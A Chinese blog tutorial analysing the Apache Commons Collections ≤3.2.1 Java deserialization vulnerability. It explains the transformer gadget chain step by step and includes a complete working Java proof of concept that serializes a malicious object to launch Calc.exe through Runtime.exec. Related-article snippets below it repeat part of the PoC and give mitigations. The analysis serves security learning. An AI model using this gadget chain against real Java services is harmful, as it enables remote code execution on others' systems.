Apache Commons Collections 反序列化漏洞

最新推荐文章于 2025-03-05 00:45:00 发布
最新推荐文章于 2025-03-05 00:45:00 发布
阅读量1.4k 收藏 25
点赞数 22
CC 4.0 BY-SA版权
文章标签: 学习 web安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/WYJAI/article/details/143465679

文章目录

前言

Apache Commons Collections是一个扩展了Java标准库里的Collection结构的第三方基础库,它提供了很多强大的数据结构类型和实现了各种集合工具 类。作为Apache开放项目的重要组件,Commons Collections被广泛的各种Java应用的开发。可以在Apache官网下载CC的jar文件和源代码,用于代码审计。

Java集合框架:称为Collection,是Java中存在的一系列操作List、Set和Map的类的集合。Commons Collections扩展了集合框架,增强了很多功能。

一、漏洞爆出

·2015.01.28 Gabriel Lawrence和Chris Frohoff
https://speakerdeck.com/frohoff/appseccali-2015-marshalling-pickles-how-deserializing-objects-can-ruin-your-day
https://github.com/frohoff/ysoserial
·2015.11.06 FoxGlove Security @breenmachine
https://commons.apache.org/proper/commons-collections/release_3_2_2.html
https://issues.apache.org/jira/browse/COLLECTIONS-580

二、复现环境

jdk1.7.0 80
IDEA Project Structrure, Settings–Java
compile等设置成java7
Apache Commons Collections 3.2.1

java集合框架

图片来自马士兵

问题

1、哪里出现了可以执行任意代码的问题?
2、序列化的payload怎么构造?

JVM

Java代码运行原理:
1、源码
2、编译器(javac)编译为字节码.class文件
3、各平台JⅣM解释器把字节码文件转换成操作系统指令(Java能达到跨平台的原因)

反射

在程序运行的时候动态创建一个类的实例,调用实例的方法和访问它的属性
Class —— Instance
Person —— new Person(“laow”)

三、Apache Commons Collections漏洞原理≤3.2.1

CC关键类

○InvokeTransformer
利用Java反射机制来创建类实例
○ChainedTransformer
实现了Transformer链式调用,我们只需要传入一个Transformer数组 ChainedTransformer就可以实现依次的去调用每一个Transformer的transform()方法
○ConstantTransformer
transform()返回构造函数的对象
○TransformedMap

调用链路

图片来自马士兵

POC构造思路

1. InvokeTransformer
反射执行代码
2. ChainedTransformer
链式调用,自动触发
3. ConstantTransformer
获得对象
4. TransformedMap
元素变化执行transform,setValue——checkSetValue
5. AnnotationInvocationHandler
readObject 调用Map的setValue
在这里插入图片描述

InvokeTransformer中有一个transform方法,可以获得一个对象(Class.forName()或input.getClass()两种获得类对象的方法).class,
然后获得对象的方法,调用invoke触发其方法
有了这个方法,我们总不能认为这个方法会自己去跑吧!!!
于是,我们通过invokerTransformer = new InvokerTransformer(
                "exec",
                new Class[]{String.class},
                new String[]{"Calc.exe"}
                设置函数名称exec,类型,值   然后
                Object input = Runtime.getRuntime();
                创建外部程序执行命令的方法对象   传给invokerTransformer的transform方法
            	invokerTransformer.transform(input);
            	这个方法就会自动进行如下操作
            						完整的Runtime.getRuntime().exec("./p.exe");实现
            	Class cls = input.getClass();//获取Runtime.getRuntime()对象
            	//获取Runtime.getRuntime()对象的方法(exec,方法类型)
                Method method = cls.getMethod(this.iMethodName, this.iParamTypes);
                通过invoke触发Runtime.getRuntime()对象的所有方法,这里填入的值是Calc.exe
                return method.invoke(input, this.iArgs);
完整代码
public static void main(String[] args) {
        //创建实例传入构造方法参数(函数名 参数类型 参数值)
        InvokerTransformer invokerTransformer = new InvokerTransformer(
                "exec",
                new Class[]{String.class},
                new String[]{"Calc.exe"}
        );
        try {
            Object input = Runtime.getRuntime();
            invokerTransformer.transform(input);
        }catch (Exception e){
            e.printStackTrace();
        }
    }
到这里,我们自己去写的就可以实现弹出计算器了,但是在实际的攻击中,我们要做到这点,利用现成的方法去做还是比较困难,
所以我们又找到了ChainedTransformer

在这里插入图片描述
我们只需要传入一个Transformer数组ChainedTransformer就可以实现依次的去调用每一个Transformer的transform方法。
通过ConstantTransformer类的transform方法获取一个对象类型,如transform参数是Runtime.class时,调用ConstantTransformer类的transform方法,执行后返回java.lang.Runtime类
可能就会有人要问传入一个Runtime.getRuntime,最后返回这个一个对象,这样有啥意义,自己觉得没啥意义,唯一的意义就是它是Transform的子类,在CC链中很有意义!相当于实现调用invokerTransformer.transform(input);后,会执行的Class cls = input.getClass();
在这里插入图片描述
到这里,就又会有一个问题,chainedTransformer.transform(null);又凭什么能自动执行呢,所以我们又找到了下面的类TransformedMap,那么我们要怎么让他来触发transform,于是找到TransformedMap中的checkSetValue,那么什么时候又会执行checkSetValue呢,所以又找到了TransformedMap的父类AbstractInputCheckedMapDecorator中的setValue
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
那么一个Map的setValue什么时候会触发呢,当其中的元素增加、删除、修改的时候就会调用setValue,所以我们需要找一个对象,他在反序列化的时候,会给一个Map对象赋值,或者调用setValue。
于是我们就找到了AnnotationInvocationHandler,它在反序列化时,调用readObject,他在里面用了Entry(这个实质上就是Map)在其中调用了setValue
在这里插入图片描述
在这里插入图片描述
通过TransformedMap.decorate 返回一个键为null 值为transformedChain的一个TransformedMap,这里的hashmap键值对啥都行,TransformedMap实例化需要,而最终利用的就是这个对象中的entry的setValue方法,通过setValue可以触发Map的checkSetValue,从而触发transform

POC
Transformer[] transforms = new Transformer[]{
        //获得Runtime类对象
        new ConstantTransformer(Runtime.class),
        //传入Runtime类对象,反射执行getMethod获得getRuntime方法
        new InvokerTransformer(
                "getMethod",
                new Class[]{String.class,Class[].class},
                new Object[]{"getRuntime",new Class[0]}
        ),
        //传入getRuntime方法,反射执行invoke方法,得到Runtime实列
        new InvokerTransformer("invoke",
                new Class[]{Object.class, Object[].class},
                new Object[]{null, null}),
        //传入Runtime实列 ,执行exec方法
        new InvokerTransformer("exec",
                new Class[]{String.class},
                new Object[]{"Calc.exe"})
};

ChainedTransformer chainedTransformer = new ChainedTransformer(transforms);

Map innermap = new HashMap();
innermap.put("value","value");
Map outermap = TransformedMap.decorate(innermap, null, chainedTransformer);
//构造包含恶意map的AnnotationInvocationHandler对象
Class cl = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
Constructor cst = cl.getDeclaredConstructor(Class.class, Map.class);
cst.setAccessible(true);
Object exploitObj = cst.newInstance(Target.class, outermap);

//序列化
FileOutputStream fos = new FileOutputStream("payload.bin");
ObjectOutputStream oos = new ObjectOutputStream(fos);
oos.writeObject(exploitObj);
oos.close();

//反序列化
FileInputStream fis = new FileInputStream("payload.bin");
ObjectInputStream ois = new ObjectInputStream(fis);
Object result = ois.readObject();
ois.close();
反序列化渗透与攻防(三)之Apache Commons Collections反序列化漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
04-14 1513
Apache Commons Collections 是一个扩展了Java标准库里集合类Collection结构的第三方基础库,它提供了很多强有力的数据结构类型并且实现了各种集合工具类。作为Apache开源项目的重要组件,Commons Collections被广泛应用于各种Java应用的开发Commons Collections 实现了一个TransformedMap类,该类是对Java标准数据结构Map接口的一个扩展。
Java反序列化漏洞Apache Commons Collections
m0_61506558的博客
08-08 917
CC对JDK标准库的集合类进行了扩展,添加了一些数据结构,并且提供了工具类2015年1月28日,有两个黑客发现了CC的漏洞利用链2.2 源码分析transform()方法可以通过反射机制来进行任意函数的调用通过链式调用,实现InvokeTransformer方法的自动触发1、对利用类进行序列化,然后交给Java程序反序列化2、在进行反序列化时,会执行方法,该方法会用setValue对成员变量的Value值进行修改3、value修改触发了。......
JAVA 反序列化Apache Commons Collections 反序列化漏洞分析
辛勤搬砖的门卫的专栏
03-01 2249
Apache Commons Collections 反序列化漏洞研究
Apache Commons Collections反序列化漏洞分析
辛勤搬砖的门卫的专栏
01-05 1527
Apache Commons Collections反序列化漏洞分析
反序列化漏洞_ApacheCommonsCollections反序列化漏洞分析
weixin_39618339的博客
11-30 797
点击蓝字关注我们吧!环境搭建本文由“壹伴编辑器”提供技术JDK版本为为1.6,引入commons-collections-3.1.jar包,具体引入方法为:File -> Project Settings -> Modules -> Dependencies点击加号选择导入JARs包,再选择包的地址,点击apply成功引入。Poc():本文由“壹伴编辑器”提供技术分析...
Apache commons-collections反序列化漏洞(TransformedMap利用链)
qq_43936524的博客
04-10 670
文章目录Commons-collections概述InvokerTransformer反射触发ChainedTransformer遍历触发封装为TransformedMap寻找ReadObject触发点AnnotationInvocationHandler触发(JDK1.7)BadAttributeValueExpException(JDK1.8) Commons-collections概述 官网对Commons-collections的说明 Java commons-collections是JDK 1.
Apache Commons Collections反序列化漏洞分析与复现
smellycat000的专栏
11-30 3873
聚焦源代码安全,网罗国内外最新资讯!1.1 状态完成漏洞挖掘条件分析、漏洞复现。1.2 漏洞分析存在安全缺陷的版本:Apache Commons Collections3.2.1以下,...
Commons Collections反序列化漏洞复现——CC6
weixin_58666006的博客
08-28 1070
有关于反序列化漏洞的相关介绍在文章已经有所描述,本文不在对此方面进行赘述。
javaJavacommons-collections反序列化漏洞
九师兄
07-19 203
Apache Commons CollectionsApache Commons的组件,该漏洞的问题主要出现在org.apache.commons.collections.Transformer接口上。在Apache commons.collections中有一个InvokerTransformer实现了Transformer接口,主要作用为调用Java的反射机制来调用任意函数。影响组件版本:
Java反序列化漏洞Apache Commons Collections
南迪叶先森
06-30 877
Java反序列化漏洞Apache Commons Collections 公粽号:黒掌 一个专注于分享网络安全、黑客圈热点、黑客工具技术区博主! 前言: 最近静下心来看了很多大牛的笔记,博客,收获甚多,所以在此记录一下入坑Java安全的第一步。 Apache Commons CollectionsApache Commons的组件,该漏洞的问题主要出现在org.apache.commons.collections.Transformer接口上。在Apache commons.collections
JAVA反序列化Apache Commons Collections反序列化漏洞分析
chenwan8737的博客
08-08 1103
Apache Commons Collections反序列化漏洞必然是2015年影响重大的漏洞之一,同时也开启了各类java反序列漏洞的大门,这几年大量各类java反序列化漏洞不断出现。java反序列化漏洞基本一出必高危,风险程度极大,最近研究了一些反序列化漏洞,本篇记录apache ...
Java 反序列化漏洞-Apache Commons Collections3
cjdgg的博客
03-02 4924
Java 反序列化漏洞-Apache Commons Collections3前言javassist+TemplatesImplcom.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter 前言 之前已经学了CC1和CC2,接下来继续学习CC3。在CC2中我们用到了javassist修改字节码并配合TemplatesImpl攻击链来使用,因此我们很自然而然的想到,如果我们直接用javassist修改字节码并配合TemplatesImpl攻击链使用,就无需用I
「深度解析Java反序列化漏洞|从readObject到Apache Commons Collections漏洞利用实战(附防御方案+工具复现)」
最新发布
浩策盾悟
03-05 1786
Java 程序反序列化来自不可信源的数据时,如果数据包含恶意构造的对象,攻击者可以利用反序列化漏洞执行任意代码。以下是一个 Python 脚本,用于模拟一个 Java 反序列化漏洞攻击的示例。假设我们已经知道反序列化数据的格式。Java 是一种面向对象的编程语言,使用序列化机制将对象转换为字节流进行存储或传输。以下是一些与 Java 反序列化漏洞相关的最新。- Apache Struts2 反序列化漏洞。对象的恶意序列化数据,当反序列化发生时,类来执行序列化和反序列化操作。
java反序列化漏洞学习-apachecommonscollections
ABUG
07-24 1641
这是本地执行的结果,服务端不会有人这样写代码,特别是**transform(Runtime.getRuntime())**这样的东西,因此,当下任务是找到可以代替Runtime.getRuntime()这样写法的利用链。带还是同一个问题,这代码是在本地执行的,我们需要的是找到一个被重写的readObject()方法,可以帮我们执行transform方法。参考通过反射进行命令执行的方法,我们只要对以下三个参数可控,即可通过反射进行命令执行。这样,我们可以利用该类来执行命令。剩下的,我们要找到一个能够帮我们。
原来不只是fastjson,这个你每天都在用的类库也被爆过反序列化漏洞
勇往直前的专栏
07-13 361
在《fastjson到底做错了什么?为什么会被频繁爆出漏洞?》文章中,我从技术角度分析过为什么fastjson会被频繁爆出一些安全漏洞,然后有人在评论区发表"说到底就是fastjson烂…"等言论,一般遇到这种评论我都是不想理的。 但是事后想想,这个事情还是要单独说一下,因为这种想法很危险。 一旦这位读者有一天当上了领导,那么如果他负责的项目发生了漏洞,他还是站出来说"都怪XXX代码写的烂…",这其实是非常可怕的。 工作久了的话,就会慢慢有种感觉:代码都是人写的,是人写的代码就可能存在漏洞,这个是永远
Apache Commons Collection3.2.1反序列化分析(CC1)
st3pby的博客
01-29 2593
Apache软件基金会的一个开源项目,它提供了一组可复用的数据结构和算法的实现,旨在扩展和增强Java集合框架,以便更好地满足不同类型应用的需求。该项目包含了多种不同类型的集合类、迭代器、队列、堆栈、映射、列表、集等数据结构实现,以及许多实用程序类和算法实现。它的代码质量较高,被广泛应用于Java应用程序开发中。Commons Collections 3.1 版本的利用链衍生出多个版本的利用方式,但其核心部分是相同的,不同之处在于中间过程的构造。
Apache-Commons-Collections漏洞问题
白话机器学习
08-15 1750
Apache-Commons-Collections这个框架,相信每一个Java程序员都不陌生,这是一个非常著名的开源框架。但是,他其实也曾经被爆出过序列化安全漏洞,可以被远程执行命令。
java反序列化漏洞学习Apache Commons Collections
东方
07-30 1357
demo 一波。 最近群里都在学Java 参考: https://p0sec.net/index.php/archives/121/ https://www.xmanblog.net/java-deserialize-apache-commons-collections/ 1 环境 import org.apache.commons.collections.functors.Invoker...
Commons-Collections漏洞
weixin_34344403的博客
02-26 822
Commons-collections漏洞 0x01 POP调用链 版本:Commons-Collections3.1 下为Commons-Collections反序列实例代码: import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.InvokerTra...
Apache-ommons-Collections反序列化漏洞
12-28
### Apache Commons Collections 反序列化漏洞概述 Apache Commons CollectionsJava 中广泛使用的第三方库之一,用于提供各种集合操作功能。然而,在版本 ≤3.2.1 的 `org.apache.commons.collections` 包含了一个严重的反序列化漏洞[^1]。 该漏洞允许攻击者通过精心构造的恶意输入数据触发远程代码执行 (RCE),从而完全控制受影响的应用程序服务器。此安全缺陷主要源于某些类实现了 `Serializable` 接口并存在不安全的方法调用路径。 ### 漏洞详情 具体来说,当应用程序尝试反序列化来自不受信任源的数据时,如果这些数据被篡改为特定模式,则可能激活一系列预定义的对象图结构。这种对象图最终会调用到可以执行任意命令的操作上。例如: - 构造链中的关键组件包括但不限于 Transformer 类及其子类。 - 利用了 InvokerTransformer 和 InstantiatorTransformer 这两个类来实现动态方法调用以及实例创建的功能。 - 攻击向量通常涉及利用 ChainedTransformer 或 ConstantTransformer 来构建复杂的转换逻辑链条。 ```java // POC 示例代码片段展示如何构造恶意 payload import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; public class Exploit { public static void main(String[] args) throws Exception{ // 创建一个包含恶意指令的 transformer 链条 Transformer[] transformers = new Transformer[]{ new ConstantTransformer(Runtime.class), new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}), ... }; Transformer transformerChain = new ChainedTransformer(transformers); } } ``` 上述代码仅作为概念验证用途,并不应在生产环境中运行或测试。 ### 修复方案 为了防止此类攻击的发生,官方建议采取以下措施之一进行防护: - **升级依赖**:尽快将 commons-collections 升级至最新稳定版(>=4.x),因为新版本已经移除了易受攻击的相关特性。 - **禁用不必要的功能**:对于无法立即更新的情况,可以通过配置应用防火墙或其他手段阻止外部传入未经处理过的字节流进入 JVM 内部解析流程。 - **采用白名单机制**:只允许已知的安全类型参与序列化/反序列化进程,拒绝一切未知类型的加载请求。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Whoam_laowei

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值